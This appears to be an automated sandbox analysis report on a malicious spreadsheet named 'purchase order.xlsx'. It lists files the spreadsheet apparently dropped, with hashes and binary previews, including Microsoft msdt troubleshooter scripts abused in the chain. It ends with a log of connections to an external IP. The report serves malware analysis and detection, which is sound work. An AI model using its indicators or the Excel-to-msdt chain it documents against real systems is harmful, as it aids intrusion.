                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:CDFV2 Encrypted
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):72696
                                                                                                                                                          Entropy (8bit):7.868306503118196
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:eZfD+2fBiNR+vgt1ru46raHpu8KBZo5ujmBonFLT1J:eZyVhTWupIrocjmBoFz
                                                                                                                                                          MD5:A8930C1FCD80E9965AE26446AFB717F6
                                                                                                                                                          SHA1:0CBF04BF7FC8522AB983F0246357FA70A85EE56B
                                                                                                                                                          SHA-256:C02FF7B4D28A259D37A659A6951DBA4EE574562EF5FC3B3A0135640C0370DEE2
                                                                                                                                                          SHA-512:EAD35C97BFCCB344ED5837E82E1F648E518C52A1C6C67BD6511E018B4DC2D1364AE1F6B7DDAD69F02E58AA417402327AC3E36F175220C2C6F72FC01D4758B77F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):512
                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3::
                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):512
                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3::
                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):512
                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3::
                                                                                                                                                          MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                          SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                          SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                          SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):165
                                                                                                                                                          Entropy (8bit):1.6081032063576088
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                          MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                          SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                          SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                          SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:.pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):24702
                                                                                                                                                          Entropy (8bit):4.37978533849437
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                          MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                          SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                          SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                          SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):66560
                                                                                                                                                          Entropy (8bit):6.926109943059805
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                          MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                          SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                          SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                          SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):50242
                                                                                                                                                          Entropy (8bit):4.932919499511673
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                          MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                          SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                          SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                          SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):16946
                                                                                                                                                          Entropy (8bit):4.860026903688885
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                          MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                          SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                          SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                          SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):453
                                                                                                                                                          Entropy (8bit):4.983419443697541
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                          MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                          SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                          SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                          SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6650
                                                                                                                                                          Entropy (8bit):3.6751460885012333
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                          MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                          SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                          SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                          SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10752
                                                                                                                                                          Entropy (8bit):3.517898352371806
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                          MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                          SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                          SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                          SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                          Malicious:false
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):48956
                                                                                                                                                          Entropy (8bit):5.103589775370961
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                          MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                          SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                          SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                          SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="
                                                                                                                                                          File type:CDFV2 Encrypted
                                                                                                                                                          Entropy (8bit):7.868306503118196
                                                                                                                                                          TrID:
                                                                                                                                                          • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                                                                                          File name:purchase order.xlsx
                                                                                                                                                          File size:72696
                                                                                                                                                          MD5:a8930c1fcd80e9965ae26446afb717f6
                                                                                                                                                          SHA1:0cbf04bf7fc8522ab983f0246357fa70a85ee56b
                                                                                                                                                          SHA256:c02ff7b4d28a259d37a659a6951dba4ee574562ef5fc3b3a0135640c0370dee2
                                                                                                                                                          SHA512:ead35c97bfccb344ed5837e82e1f648e518c52a1c6c67bd6511e018b4dc2d1364ae1f6b7ddad69f02e58aa417402327ac3e36f175220c2c6f72fc01d4758b77f
                                                                                                                                                          SSDEEP:1536:eZfD+2fBiNR+vgt1ru46raHpu8KBZo5ujmBonFLT1J:eZyVhTWupIrocjmBoFz
                                                                                                                                                          TLSH:2C63D08237AB691BCC12093CD51142471E780F5869A8697BACC9B30F487D7CFED53AAD
                                                                                                                                                          File Content Preview:........................>......................................................................................................................................................................................................................................
                                                                                                                                                          Icon Hash:74ecd0d2d6d6d0dc
                                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                          Jun 28, 2022 10:45:23.336363077 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:45:23.451755047 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.451863050 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:45:23.452174902 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:45:23.572532892 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.572566032 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.572590113 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.572613955 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.572635889 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.572658062 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.572679996 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.572694063 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:45:23.572701931 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.572726965 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.572750092 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:45:23.572783947 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:45:23.574032068 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.574116945 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:45:23.689332962 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.689361095 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.689382076 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.689399004 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.689419985 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.689430952 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:45:23.689441919 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.689459085 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:23.689480066 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:45:23.689503908 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:45:29.079606056 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:45:29.079698086 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:19.438086033 CEST4977380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:19.556322098 CEST8049773172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.520191908 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.635241032 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.635344028 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.635595083 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.757875919 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.757917881 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.757942915 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.757967949 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.757992029 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.758012056 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.758013964 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.758039951 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.758063078 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.758064985 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.758090019 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.758090973 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.758115053 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.758147001 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.758224964 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.874607086 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874644041 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874670029 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874687910 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.874696970 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874725103 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874726057 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.874751091 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874774933 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874777079 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.874799967 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874809980 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.874826908 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874852896 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874854088 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.874878883 CEST8049783172.245.119.48192.168.2.4
                                                                                                                                                          Jun 28, 2022 10:46:37.874886036 CEST4978380192.168.2.4172.245.119.48
                                                                                                                                                          Jun 28, 2022 10:46:37.874903917 CEST8049783172.245.119.48192.168.2.4
